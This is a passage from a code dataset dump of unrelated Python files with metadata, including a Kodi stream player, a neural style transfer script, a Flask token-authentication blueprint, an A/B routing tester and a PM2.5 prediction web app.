masked_img = self.region_of_interest(img = canny_img)\r\n #Hough Transform Lines\r\n houghed_lines = self.hough_lines(img = masked_img, rho = 1, theta = np.pi/180, threshold = 40, min_line_len = 20, max_line_gap = 180)\r\n #Draw lines on edges\r\n #output= image * 0.8 + houghed_lines * 1. 
+ 0\r\n output = cv2.addWeighted(image, 0.8, houghed_lines, 1., 0.)\r\n \r\n return output","sub_path":"Lane_detection.py","file_name":"Lane_detection.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"84152017","text":"# -*- coding: utf8 -*-\n# version 1.0.1 par dualB\n\nimport sys,urllib, xbmcgui, xbmcplugin, xbmcaddon,re,cache, xbmc, Item, simplejson\n\n__handle__ = int(sys.argv[1])\n\n\ndef jouer_video(media_uid):\n \"\"\" function docstring \"\"\" \n show = Item.ItemVideo(media_uid)\n \n source = show['source']\n if source!='mnmedia':\n xbmc.executebuiltin('Notification(Source non supportée,Le source %s n''est pas supporté actuellement,,8000)' % simplejson.dumps(source))\n return\n\n m3u8_pl=m3u8(show['sourceId'])\n uri = obtenirMeilleurStream(m3u8_pl) \n\n if uri:\n item = xbmcgui.ListItem(\\\n show['nom'],\\\n iconImage=show['image'],\\\n thumbnailImage=show['fanart'], path=uri)\n\n play_item = xbmcgui.ListItem(path=uri)\n xbmcplugin.setResolvedUrl(__handle__,True, item)\n else:\n xbmc.executebuiltin('Notification(Aucun lien disponible,Incapable d''obtenir lien du vidéo,5000)')\n\ndef m3u8(refID):\n return cache.get_cached_content('https://mnmedias.api.telequebec.tv/m3u8/%s.m3u8' % refID,False)\n\ndef obtenirMeilleurStream(pl):\n \"\"\" function docstring \"\"\"\n maxBW = 0\n bandWidth=None\n uri = None\n for line in pl.split('\\n'):\n \n if re.search('#EXT-X',line):\n bandWidth=None\n try:\n match = re.search('BANDWIDTH=(\\d+)',line)\n bandWidth = int(match.group(1))\n except :\n bandWidth=None\n elif line.startswith('http'):\n if bandWidth!=None:\n if bandWidth>maxBW:\n maxBW = bandWidth\n uri = line\n return uri\n\n","sub_path":"resources/lib/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"86819856","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nn_bins = 100\nAtoms = np.genfromtxt('Val_atoms.txt', dtype='str')\nangle_list = np.loadtxt('Val_angles.txt', dtype=int)\nangle_list = angle_list - 1\n\n\nall_bonds = np.loadtxt('../../Dun_coordinates/all_bonds.txt')\nbond_length_means = np.zeros([all_bonds.shape[0], 4])\nfor i in range(0, all_bonds.shape[0]):\n bond_length_means[i, 0] = np.mean(all_bonds[i, :])\n bond_length_means[i, 1] = np.std(all_bonds[i, :])\n bond_length_means[i, 2] = np.min(all_bonds[i, :])\n bond_length_means[i, 3] = np.max(all_bonds[i, :])\nprint(bond_length_means[0, :])\n\n#all_angles = np.loadtxt('MD_data/all_angles.txt')\nall_angles = np.loadtxt('../../Dun_coordinates/all_angles.txt')\nbond_angle_means = np.zeros([all_angles.shape[0], 4])\nfor i in range(0, all_angles.shape[0]):\n bond_angle_means[i, 0] = np.mean(all_angles[i, :])\n bond_angle_means[i, 1] = np.std(all_angles[i, :])\n bond_angle_means[i, 2] = np.min(all_angles[i, :])\n bond_angle_means[i, 3] = np.max(all_angles[i, :])\n\n\nall_bonds = np.loadtxt('../MD_data/all_bonds.txt')\nbond_length_means_MD = np.zeros([all_bonds.shape[0], 4])\nfor i in range(0, all_bonds.shape[0]):\n bond_length_means_MD[i, 0] = np.mean(all_bonds[i, :])\n bond_length_means_MD[i, 1] = np.std(all_bonds[i, :])\n bond_length_means_MD[i, 2] = np.min(all_bonds[i, :])\n bond_length_means_MD[i, 3] = np.max(all_bonds[i, :])\n\nbond_length_means_MD = np.loadtxt('../MD_data/bond_length_means.txt')\n\n#all_angles = np.loadtxt('MD_data/all_angles.txt')\nbond_angle_means_MD = 
np.loadtxt('../MD_data/bond_angle_means.txt')\n# for i in range(0, all_angles.shape[0]):\n# bond_angle_means_MD[i, 0] = np.mean(all_angles[i, :])\n# bond_angle_means_MD[i, 1] = np.std(all_angles[i, :])\n# bond_angle_means_MD[i, 2] = np.min(all_angles[i, :])\n# bond_angle_means_MD[i, 3] = np.max(all_angles[i, :])\n\n\nind0 = bond_length_means[:, 0] < 3\nsub_means = bond_length_means[ind0, :]\nsub_MD = bond_length_means_MD[ind0, :]\nprint(sub_means.shape[0])\nplt.errorbar(np.arange(0, sub_means.shape[0]), sub_means[:, 0], yerr=sub_means[:, 1], fmt='o')\nplt.errorbar(np.arange(0, sub_MD.shape[0])+.33, sub_MD[:, 0], yerr=sub_MD[:, 1], fmt='x')\nplt.show()\n\n\nind0 = bond_angle_means[:, 0] > 100\nsub_means = bond_angle_means[ind0, :]\nsub_MD = bond_angle_means_MD[ind0, :]\nplt.errorbar(np.arange(1, sub_means.shape[0] + 1), sub_means[:, 0], yerr=sub_means[:, 1], fmt='o', capsize=2, elinewidth=2)\nplt.errorbar(np.arange(1, sub_MD.shape[0]+1) + 0.33, sub_MD[:, 0], yerr=sub_MD[:, 1], fmt='o',capsize=2, elinewidth=2)\nplt.plot([5.7, 5.7], [100, 130], 'k')\nplt.plot([10.7, 10.7], [100, 130], 'k')\nplt.plot([15.7, 15.7], [100, 130], 'k')\nplt.plot([20.7, 20.7], [100, 130], 'k')\nplt.plot([25.7, 25.7], [100, 130], 'k')\nplt.plot([30.7, 30.7], [100, 130], 'k')\nplt.plot([35.7, 35.7], [100, 130], 'k')\n\nplt.show()\nprint(angle_list[ind0, :])\nsub_list = angle_list[ind0, :]\nfor i in range(0, sub_list.shape[0]):\n\tprint(Atoms[sub_list[i, 0]], Atoms[sub_list[i, 1]], Atoms[sub_list[i, 2]])\n\n\n","sub_path":"Code/compare_babl.py","file_name":"compare_babl.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41849875","text":"class Tocka:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return 'Tocka(x={}, y={})'.format(self.x, self.y)\n\n\nclass Premica:\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n\n def __repr__(self):\n return 'Premica(a={}, b={}, c={})'.format(self.a, self.b, self.c)\n\n def pravokotnica(self, tocka):\n a = -self.b\n b = self.a\n c = -(a * tocka.x + b * tocka.y)\n return Premica(a, b, c)\n\n def presecisce(self, other):\n a1, b1, c1 = self.a, self.b, self.c\n a2, b2, c2 = other.a, other.b, other.c\n x = b1 * c2 - b2 * c1\n y = a2 * c1 - a1 * c2\n w = a1 * b2 - a2 * b1\n if w != 0:\n return Tocka(x / w, y / w)\n\n\nt = Tocka(1, 1)\np = Premica(1, 0, 0)\nq = p.pravokotnica(t)\nu = p.presecisce(q)\n","sub_path":"datoteke-s-predavanj/2017-18/09-objekti/staticna-geometrija.py","file_name":"staticna-geometrija.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"579513287","text":"import os\nimport sys\nimport scipy.io\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imshow\nfrom PIL import Image\nimport numpy as np\nimport tensorflow as tf\nimport pprint\nfrom nst_utils import *\nimport imageio\n\n\n# %matplotlib inline\n\n# pp = pprint.PrettyPrinter(indent=4)\n# model = load_vgg_model(\"pre-trained-model/imagenet-vgg-verydeep-19.mat\")\n\n\n# pp.pprint(model)\n\n\n# @ Computing the content cost\n# FUNCTION: compute_content_cost\ndef compute_content_cost(a_C, a_G):\n '''\n\n :param a_C -- the tensor of shape (1, H, W, C), hidden layer activations representing content of the image C\n :param a_G -- the tensor of shape (1, H, W, C), hidden layer activations representing content of the image G\n :return: J_content -- the content 
cost between image G and image C\n '''\n\n # Retrieve dimensions from a_G\n m, n_H, n_W, n_C = a_G.get_shape().as_list()\n\n # Reshape a_C and a_G\n a_C_unrolled = tf.reshape(a_C, shape=[m, -1, n_C])\n a_G_unrolled = tf.reshape(a_G, shape=[m, -1, n_C])\n\n # Compute the cost\n J_content = tf.reduce_sum(tf.square(tf.subtract(a_C_unrolled, a_G_unrolled))) / (4 * n_H * n_W * n_C)\n\n return J_content\n\n\n# @ Computing the style cost\n# FUNCTION: gram_matrix\ndef gram_matrix(A):\n '''\n\n :param A: matrix of shape (C, H*W)\n :return: Gram matrix of A, of shape (C, C)\n '''\n GA = tf.matmul(A, tf.transpose(A))\n\n return GA\n\n\n# FUNCTION: compute_layer_style_cost\ndef compute_layer_style_cost(a_S, a_G):\n '''\n\n :param a_S: tensor of shape (1, H, W, C), hidden layer activations representing style of the image S\n :param a_G: tensor of shape (1, H, W, C), hidden layer activations representing style of the image G\n :return: J_style_layer: tensor representing style cost of given layer between G and S\n '''\n\n # Retrieve dimensions from a_G\n m, n_H, n_W, n_C = a_G.get_shape().as_list()\n\n # Reshape images to shape (n_C, n_H*n_W)\n a_S = tf.reshape(tf.transpose(a_S, perm=[0, 3, 1, 2]), shape=[n_C, -1])\n a_G = tf.reshape(tf.transpose(a_G, perm=[0, 3, 1, 2]), shape=[n_C, -1])\n\n # Computing gram_matrix for both images S and G\n GS = gram_matrix(a_S)\n GG = gram_matrix(a_G)\n\n # Computing the loss\n J_style_layer = tf.reduce_sum(tf.square(tf.subtract(GS, GG))) / (4 * (n_H * n_W) * (n_H * n_W) * (n_C * n_C))\n\n return J_style_layer\n\n\n# Style weights for different layers\nSTYLE_LAYERS = [\n ('conv1_1', .2),\n ('conv2_1', .2),\n ('conv3_1', .2),\n ('conv4_1', .2),\n ('conv5_1', .2)\n]\n\n\n# FUNCTION: compute_style_cost\ndef compute_style_cost(model, STYLE_LAYERS):\n '''\n\n :param model: the loaded model\n :param STYLE_LAYERS: the weights for style cost of different layers\n :return: style cost\n '''\n\n # initialize the overall style cost\n J_style = 0\n\n for layer_name, coeff in STYLE_LAYERS:\n # Select the output tensor of the currently selected layer\n out = model[layer_name]\n\n # Set a_S to be the hidden layer activation from the layer we have selected, by running the session on out\n a_S = sess.run(out)\n\n # Set a_G to be the hidden layer activation from same layer. Here, a_G references model[layer_name]\n # and isn't evaluated yet. Later in the code, we'll assign the image G as the model input, so that\n # when we run the session, this will be the activations drawn from the appropriate layer, with G as input.\n a_G = out\n\n # Compute style_cost for the current layer\n J_style_layer = compute_layer_style_cost(a_S, a_G)\n\n # Add coeff * J_style_layer of this layer to overall style cost\n J_style += coeff * J_style_layer\n\n return J_style\n\n\n# @ Defining the total cost to optimize\n# FUNCTION: total_cost\ndef total_cost(J_content, J_style, alpha=10, beta=40):\n '''\n\n :param J_content: the content cost between G and C\n :param J_style: the style cost between G and S\n :param alpha: hyperparam. weighting the importance of the content cost\n :param beta: hyperparam. 
weighting the importance of the style cost\n :return: J: total cost\n '''\n\n J = alpha * J_content + beta * J_style\n\n return J\n\n\n# @ Solve the optimization problem\n# Reset the graph\n# tf.reset_default_graph()\n# Start interactive session\nsess = tf.Session()\n\n# Content image\ncontent_image = imageio.imread('images/louvre_small.jpg')\ncontent_image = reshape_and_normalize_image(content_image)\n\n# Style image\nstyle_image = imageio.imread('images/monet.jpg')\nstyle_image = reshape_and_normalize_image(style_image)\n\n# Initialize generated image correlated with content image\ngenerated_image = generate_noise_image(content_image)\n# imshow(generated_image[0])\n# plt.show()\n\n# Load pre-trained model\nmodel = load_vgg_model(\"pre-trained-model/imagenet-vgg-verydeep-19.mat\")\n\n# content cost\n# Assign the content image to be the input of the model\nsess.run(model['input'].assign(content_image))\n# Select the output tensor of layer conv4_2\nout = model['conv4_2']\n# Set a_C to be the hidden layer activation from the layer we have selected\na_C = sess.run(out)\n# Set a_G to be the hidden layer activation from same layer. Here, a_G references model['conv4_2']\n# and isn't evaluated yet. Later in the code, we'll assign the image G as the model input, so that\n# when we run the session, this will be the activations drawn from the appropriate layer, with G as input.\na_G = out\n# Compute the content cost\nJ_content = compute_content_cost(a_C, a_G)\n\n# style cost\n# Assign the input of the model to be the \"style\" image\nsess.run(model['input'].assign(style_image))\n# Compute the style cost\nJ_style = compute_style_cost(model, STYLE_LAYERS)\n\n# total cost\nJ = total_cost(J_content, J_style, alpha=10, beta=40)\n\n# define optimizer\noptimizer = tf.train.AdamOptimizer(2.0)\n\n# define train_step\ntrain_step = optimizer.minimize(J)\n\n# FUNCTION: model\ndef model_nn(sess, input_image, num_iterations=200):\n # Initialize global variables\n sess.run(tf.global_variables_initializer())\n\n # Run the noisy input image through the model\n sess.run(model['input'].assign(input_image))\n\n for i in range(num_iterations):\n # Run the session on the train_step to minimize the total cost\n sess.run(train_step)\n\n # Compute the generated image by running the session on the current model['input']\n generated_image = sess.run(model['input'])\n\n if i%20 == 0:\n Jt, Jc, Js = sess.run([J, J_content, J_style])\n print(\"Iteration \" + str(i) + \" :\")\n print(\"total cost = \" + str(Jt))\n print(\"content cost = \" + str(Jc))\n print(\"style cost = \" + str(Js))\n\n # save current generated image in the \"/output\" directory\n save_image(\"output/\" + str(i) + \".png\", generated_image)\n\n # save last generated image\n save_image('output/generated_image.jpg', generated_image)\n\n return generated_image\n\nmodel_nn(sess, generated_image)\n\n","sub_path":"neural_styple_transfer.py","file_name":"neural_styple_transfer.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"13277211","text":"import os\r\nimport CppHeaderParser\r\nimport sys\r\nfrom CppHeaderParser import CppHeader\r\nfrom typing import List, Dict\r\nfrom string import Template\r\n\r\n\r\ndef get_cpp_header_info(input_file_path: str) -> CppHeader:\r\n return CppHeaderParser.CppHeader(input_file_path)\r\n\r\n\r\ndef fill(text: str, key_value_pairs: Dict[str, str]) -> str:\r\n return Template(text).substitute(key_value_pairs)\r\n\r\n\r\ndef 
enum_definitions(cppHeader: CppHeader, is_enum_class: bool) -> List[str]:\r\n def enum_name(name: str) -> str:\r\n if is_enum_class:\r\n return fill(\"enum class $name {\",\r\n {\"name\": name})\r\n else:\r\n return fill(\"enum $name {\",\r\n {\"name\": name})\r\n lines = []\r\n for enum in cppHeader.enums:\r\n lines.append(enum_name(enum[\"name\"]))\r\n n = len(enum[\"values\"])\r\n for index, value in enumerate(enum[\"values\"]):\r\n if index == n - 1:\r\n lines.append(value[\"name\"] + \"=\" + str(value[\"value\"]))\r\n else:\r\n lines.append(value[\"name\"] + \"=\" + str(value[\"value\"]) + \",\")\r\n lines.append(\"};\\n\")\r\n return lines\r\n\r\n\r\ndef enum_to_string(cppHeader, is_enum_class):\r\n func_def = \"\"\"\r\n template <> class Enum<$enum_type> {\r\n public:\r\n static std::string ToString($enum_type value) {\r\n switch (value) {\"\"\"\r\n lines = []\r\n for enum in cppHeader.enums:\r\n lines.append(fill(func_def, {\"enum_type\": enum[\"name\"]}))\r\n for value in enum[\"values\"]:\r\n if is_enum_class:\r\n lines.append(\"case {0}::{1}: return \\\"{0}::{1}\\\";\".format(\r\n enum[\"name\"], value[\"name\"]\r\n ))\r\n else:\r\n lines.append(\"case {0}: return \\\"{0}\\\";\".format(value[\"name\"]))\r\n lines.append(\r\n \"default: return \\\"ENUMERATION VALUE OUT OF BOUND\\\"; }}};\")\r\n return lines\r\n\r\n\r\ndef enum_generic_to_string():\r\n return \"\"\"\r\n template <class TEnum> class Enum {\r\npublic:\r\n static std::string ToString(TEnum) {\r\n return \"ENUMERATION VALUE OUT OF BOUND\";\r\n }\r\n};\"\"\"\r\n\r\n\r\ndef main():\r\n is_enum_class = True\r\n input_file_path = \"enum/Enum_Template.cpp\"\r\n cppHeader = get_cpp_header_info(input_file_path)\r\n print(\"#ifndef ENUM_HPP\")\r\n print(\"#define ENUM_HPP\")\r\n for header in cppHeader.includes:\r\n print(\"#include {0}\".format(header))\r\n print()\r\n lines = enum_definitions(cppHeader, is_enum_class)\r\n print(\"\\n\".join(lines))\r\n print(enum_generic_to_string())\r\n lines = enum_to_string(cppHeader, is_enum_class)\r\n print(\"\\n\".join(lines))\r\n print(\"\\n#endif // ENUM_HPP\")\r\n\r\n\r\n# python enum_helper.py | clang-format.exe > Enum.hpp\r\n# python .\\enum_helper.py | clang-format.exe | Out-File -Encoding utf8NoBOM \"Enum.hpp\"\r\nmain()\r\n","sub_path":"compiler/scripts/cpp_enum_generator.py","file_name":"cpp_enum_generator.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} {"seq_id":"550743621","text":"# -*- coding: utf-8 -*-\n__author__ = 'bliss'\n\nfrom flask import jsonify, request, g\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\nfrom itsdangerous import SignatureExpired, BadSignature\nfrom flask import current_app\n\nfrom herovii.service import account\nfrom herovii.libs.error_code import AuthFailed, ParamException, JSONStyleError\nfrom herovii.libs.bpbase import ApiBlueprint, auth\nfrom herovii.validator.forms import GetTokenForm\nfrom herovii.libs.scope import is_in_scope\nfrom herovii.libs.enums import AccountTypeEnum\n\napi = ApiBlueprint('token')\n\n\n@api.route('', methods=['POST'])\ndef get_token():\n \"\"\"Get a token.\"\"\"\n # uid = g.uid\n form = GetTokenForm.create_api_form()\n uid_scope = verify_user(form.account.data, form.secret.data, form.type.data)\n if uid_scope is None:\n raise AuthFailed(error='id or password is incorrect', error_code=1005)\n expiration = current_app.config['TOKEN_EXPIRES_IN']\n token = generate_auth_token(uid_scope[0], form.type.data, uid_scope[1], 
expiration)\n    return jsonify({'token': token.decode('ascii')}), 201\n\n\n@api.route('/info', methods=['POST'])\ndef get_token_info():\n    \"\"\"Get token info\"\"\"\n    json = request.get_json(force=True, silent=True)\n    if not json:\n        raise JSONStyleError()\n    else:\n        s = Serializer(current_app.config['SECRET_KEY'])\n        token = json['token']\n        try:\n            data = s.loads(token, return_header=True)\n        except SignatureExpired:\n            raise AuthFailed(error='token is expired', error_code=1003)\n        except BadSignature:\n            raise AuthFailed(error='token is invalid', error_code=1002)\n\n    r = {\n        'scope': data[0]['scope'],\n        'create_at': data[1]['iat'],\n        'expire_in': data[1]['exp'],\n        'uid': data[0]['uid']\n    }\n    return jsonify(r), 200\n\n\ndef refresh_token():\n    pass\n\n\ndef verify_user(ac, secret, ac_type):\n    \"\"\"Verify the user's identity\"\"\"\n    try:\n        if isinstance(ac_type, int) or str.isnumeric(ac_type):\n            ac_type = int(ac_type)\n            ac_type = AccountTypeEnum(ac_type)\n        else:\n            ac_type = AccountTypeEnum[ac_type]\n    except ValueError:\n        raise ParamException(error='the type parameter is not in range')\n    promise = {\n        AccountTypeEnum.app: account.verify_in_heroapi,\n        AccountTypeEnum.use_csu_social: account.verify_in_csu_by_social,\n        AccountTypeEnum.user_csu_mobile: account.verify_in_csu_by_mobile,\n        AccountTypeEnum.user_org_mobile: account.verify_in_org_by_mobile,\n        AccountTypeEnum.user_stats_account: account.verify_in_stats_by_account,\n    }\n    return promise.get(ac_type)(ac, secret)\n\n\n@auth.verify_password\ndef verify_password(token, password):\n    # password is unused here, but it is kept for now because the http-auth library expects this signature\n    if current_app.config['REMOVE_TOKEN_VERIFY']:\n        return True\n    user_info = verify_auth_token(token)\n    if not user_info:\n        return False\n    else:\n        g.user = user_info\n        return True\n\n\n@auth.error_handler\ndef error_handler():\n    raise AuthFailed()\n\n\ndef generate_auth_token(uid, ac_type, scope, expiration=7200):\n    \"\"\"Generate a token\"\"\"\n    s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration)\n    return s.dumps({'uid': uid, 'type': int(ac_type), 'scope': scope})\n\n\ndef verify_auth_token(token):\n    \"\"\"Verify that the token is valid\"\"\"\n    s = Serializer(current_app.config['SECRET_KEY'])\n    try:\n        # data = s.loads(token)\n        data = s.loads(token)\n    except SignatureExpired:\n        raise AuthFailed(error='token is expired', error_code=1003)\n        # return None  # valid token, but expired\n    except BadSignature:\n        raise AuthFailed(error='token is invalid', error_code=1002)\n        # return None  # invalid token\n\n    uid = data['uid']\n    scope = data['scope']\n    ac_type = data['type']\n    if not current_app.config['REMOVE_SCOPE_CONTROL']:\n        allow = is_in_scope(scope, request.endpoint)\n        if not allow:\n            raise AuthFailed(error='forbidden, not in scope', error_code=1004, code='403')\n    return [uid, ac_type]\n\n\n","sub_path":"herovii/api/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"167283500","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nmap.py\n\nCreated by 刘 智勇 on 2012-03-07.\nCopyright (c) 2012 __MyCompanyName__. 
All rights reserved.\n\"\"\"\n\nimport logging\nimport uuid\nfrom datetime import datetime\nimport time\n\nfrom huwai.config import DB_CON, DB_NAME, DEFAULT_CUR_UID\nfrom modules import MapDoc\nfrom api import API\n\nclass Map(object):\n    def __init__(self, id=None, api=None):\n        self._api = api if api else MapAPI()\n        if id:\n            ret = self._api.one(_id=id)\n            self.info, self.eid = (ret[1], ret[1]['_id']) if ret[0] else (None, None)\n    \n    def __getattr__(self, key):\n        if hasattr(self, 'info') and self.info and (key in self.info):\n            return self.info[key]\n        else:\n            return None\n    \nclass MapAPI(API):\n    def __init__(self):\n        DB_CON.register([MapDoc])\n        datastore = DB_CON[DB_NAME]\n        col_name = MapDoc.__collection__\n        collection = datastore[col_name]\n        doc = collection.MapDoc()\n        API.__init__(self, col_name=col_name, collection=collection, doc=doc)\n    \n    def save(self, owner, subject, location=None, polyline=None, link=None, **kwargs):\n        return super(MapAPI, self).create(owner=owner, subject=subject, location=location, polyline=polyline, link=link, **kwargs)\n    \n    def _output_format(self, result=[], cuid=DEFAULT_CUR_UID):\n        now = datetime.now()\n        output_map = lambda i: {'id':i['_id'], 'added_id':i['added_id'], 'owner':i['owner'], 'is_own':(cuid==i['owner'] if i['owner'] else True), 'created':self._escape_created(now, i['created']), 'subject':i['subject'], 'link':i['link'], 'polyline':i['polyline'], 'location':i['location']}\n        if isinstance(result, dict):\n            return output_map(result)\n        return map(output_map, result)\n    \n    def get(self, id):\n        r = self.one(_id=id)\n        if (r[0] and r[1]):return (True, self._output_format(result=r[1]))\n        return r\n    \n    def near(self, cuid=DEFAULT_CUR_UID, near=[]):\n        r = self.find(**{\"location\": {\"$near\": near}})\n        if r[0]:\n            kw = {'result':r[1]}\n            if cuid:kw['cuid']=cuid\n            l = self._output_format(**kw)\n            return (True, l)\n        else:\n            return (False, r[1])\n    \n    # topic was referenced in the body below but missing from the signature,\n    # which raised a NameError whenever list() was called\n    def list(self, cuid=DEFAULT_CUR_UID, owner=None, subject=None, topic=None, location=None):\n        kwargs = {}\n        if owner:kwargs['owner']=owner\n        if subject:kwargs['subject']={'$in':subject}\n        if topic:kwargs['topic'] = {'$in':topic} if isinstance(topic, list) else topic\n        r = self.find(**kwargs)\n        if r[0]:\n            kw = {'result':r[1]}\n            if cuid:kw['cuid']=cuid\n            l = self._output_format(**kw)\n            return (True, l)\n        else:\n            return (False, r[1])\n    \n    \n    \n    ","sub_path":"apps/imap.py","file_name":"imap.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"370611958","text":"import numpy as np\n\nradius = 5\nl_cube = 10\n\nbasis = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype = int)\n\ndef get_pos(translations):\n    t = np.array(translations, dtype = int)\n    return np.matmul(t, basis)\n\nwith open(\"defects_sphere.txt\", 'w') as f:\n    center = get_pos([l_cube/2, l_cube/2, l_cube/2])\n\n    for a in range(l_cube):\n        for b in range(l_cube):\n            for c in range(l_cube):\n                d = np.linalg.norm( get_pos([a, b, c]) - center )\n                if d > radius:\n                    f.write(\"0 {0} {1} {2} -1\\n\".format(a, b, c))\n\n","sub_path":"util/write_sphere_defects.py","file_name":"write_sphere_defects.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"163524144","text":"#! 
/usr/bin/env python\n\nimport argparse\nimport requests\nimport time\n\n#\n# Author: Leandro Beretta \n#\n# Script to test traffic routing with A/B deployments in OpenShift\n#\n\n\ndef create_arg_parser():\n \"\"\" Creates the argument parser to user. \"\"\"\n\n custom_parser = argparse.ArgumentParser(description='Test traffic routing with A/B deployments in OpenShift')\n\n custom_parser.add_argument('url',\n metavar='url',\n type=str,\n help='The URL to test the service (GET Method used)')\n\n custom_parser.add_argument('N',\n metavar='n',\n type=int,\n help='The number of requests to execute')\n\n return custom_parser\n\n\nif __name__ == '__main__':\n parser = create_arg_parser()\n args = parser.parse_args()\n\n try:\n for n in range(1, args.N + 1):\n response = requests.get(args.url)\n body = response.json()\n\n print('Request: {:2} - Status Code: {} - Version: {}'.format(n, response.status_code, body['version']))\n\n time.sleep(1)\n except KeyboardInterrupt:\n quit(0)","sub_path":"demo/traffic_tester.py","file_name":"traffic_tester.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"229324191","text":"\"\"\"\nExample \"downtime\" server\n\nWhen a user tries to connect, the server will kick them with the MOTD\n\"\"\"\n\nfrom quarry.net.server import ServerFactory, ServerProtocol\n\n\nclass DowntimeProtocol(ServerProtocol):\n def packet_login_start(self, buff):\n buff.discard()\n self.close(self.factory.motd)\n\n\nclass DowntimeFactory(ServerFactory):\n protocol = DowntimeProtocol\n\n\ndef main(args):\n # Parse options\n import optparse\n parser = optparse.OptionParser(\n usage=\"usage: %prog [options]\")\n parser.add_option(\"-a\", \"--host\",\n dest=\"host\", default=\"\",\n help=\"address to listen on\")\n parser.add_option(\"-p\", \"--port\",\n dest=\"port\", default=\"25565\", type=\"int\",\n help=\"port to listen on\")\n parser.add_option(\"-m\", \"--message\",\n dest=\"message\", default=\"We're down for maintenance\",\n help=\"message to kick users with\")\n (options, args) = parser.parse_args(args)\n\n # Create factory\n factory = DowntimeFactory()\n factory.motd = options.message\n\n # Listen\n factory.listen(options.host, options.port)\n factory.run()\n\n\nif __name__ == \"__main__\":\n import sys\n main(sys.argv[1:])","sub_path":"examples/server_downtime.py","file_name":"server_downtime.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"500779043","text":"import numpy as np\nimport pandas as pd\nfrom flask import Flask, request, jsonify, render_template\nimport pickle\nfrom sklearn.preprocessing import PowerTransformer\nfrom sklearn.model_selection import train_test_split\nTEMPLATES_AUTO_RELOAD=True\n\napp = Flask(__name__)\nmodel = pickle.load(open('model5.pkl', 'rb'))\n\ndf4=pd.read_csv(\"file2.csv\")\ndf5=df4.copy()\n\ndf5=df5.drop(columns=[\"year\",\"month\",\"day\",\"hour\"])\ndf5=df5.reindex([\"wind_speed\",\"wind_direction\",\"pressure\",'rain',\"temperature\",'PM2.5'],axis=1)\nY=df5['PM2.5']\ndf5.drop(columns=[\"PM2.5\"],inplace=True)\nX_train, X_test,Y_train, Y_test = train_test_split(df5, Y, 
test_size=0.2,random_state=0)\n\nsc2=PowerTransformer()\nsc2.fit(X_train)\nX_train2=sc2.transform(X_train)\nX_test2=sc2.transform(X_test)\n\n\nsc3=PowerTransformer()\nsc3.fit(Y_train.values.reshape(-1,1))\nY_train2=sc3.transform(Y_train.values.reshape(-1,1))\nY_test2=sc3.transform(Y_test.values.reshape(-1,1))\nDict = {0: 'E', 1: 'ENE', 2: 'ESE',3: 'N', 4: 'NE', 5: 'NNE', 6: 'NNW', 7: 'NW', 8: 'S', 9: 'SE', 10:'SSE', 11:'SSW', 12:'SW', 13:'W', 14:'WNW', 15:'WSW'}\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n '''\n For rendering results on HTMLGUI\n '''\n float_features = [float(x) for x in request.form.values()]\n final_features = np.array(float_features)\n final_features1=final_features[4:9:1]\n print(final_features1)\n final_features1[4]=final_features1[4]+273\n final_features1=sc2.transform(final_features1.reshape(1,-1))\n prediction = model.predict(final_features1)\n prediction[0]=sc3.inverse_transform(prediction[0].reshape(1,-1))\n output = prediction[0].astype(\"int\")\n index=final_features[5].astype(\"int\")\n temp=(final_features[8]-273)\n temp=round(temp,2)\n return render_template('index.html', prediction_text1='Year= {}'.format(final_features[0].astype(\"int\")),\n prediction_text2='Month= {}'.format(final_features[1].astype(\"int\")),\n prediction_text3='Day= {}'.format(final_features[2].astype(\"int\")),\n prediction_text4='Hour= {}'.format(final_features[3].astype(\"int\")),\n prediction_text5='Wind Speed= {}'.format(final_features[4]),\n prediction_text6='Wind Direction= {}'.format(Dict[index]),\n prediction_text7='Pressure= {}'.format(final_features[6]),\n prediction_text8='Rain= {}'.format(final_features[7]),\n prediction_text9='Temperature= {}'.format(temp),\n prediction_text='PM2.5 concentration is {}'.format(output))\n@app.route('/predict_api',methods=['POST'])\ndef predict_api():\n '''\n For direct API calls trought request\n '''\n data = request.get_json(force=True)\n prediction = model.predict([np.array(list(data.values()))])\n\n output = prediction[0]\n return jsonify(output)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"329168412","text":"# coding: utf-8\nimport array, bisect, collections, copy, heapq, itertools, math, random, re, string, sys, time\n\nsys.setrecursionlimit(10 ** 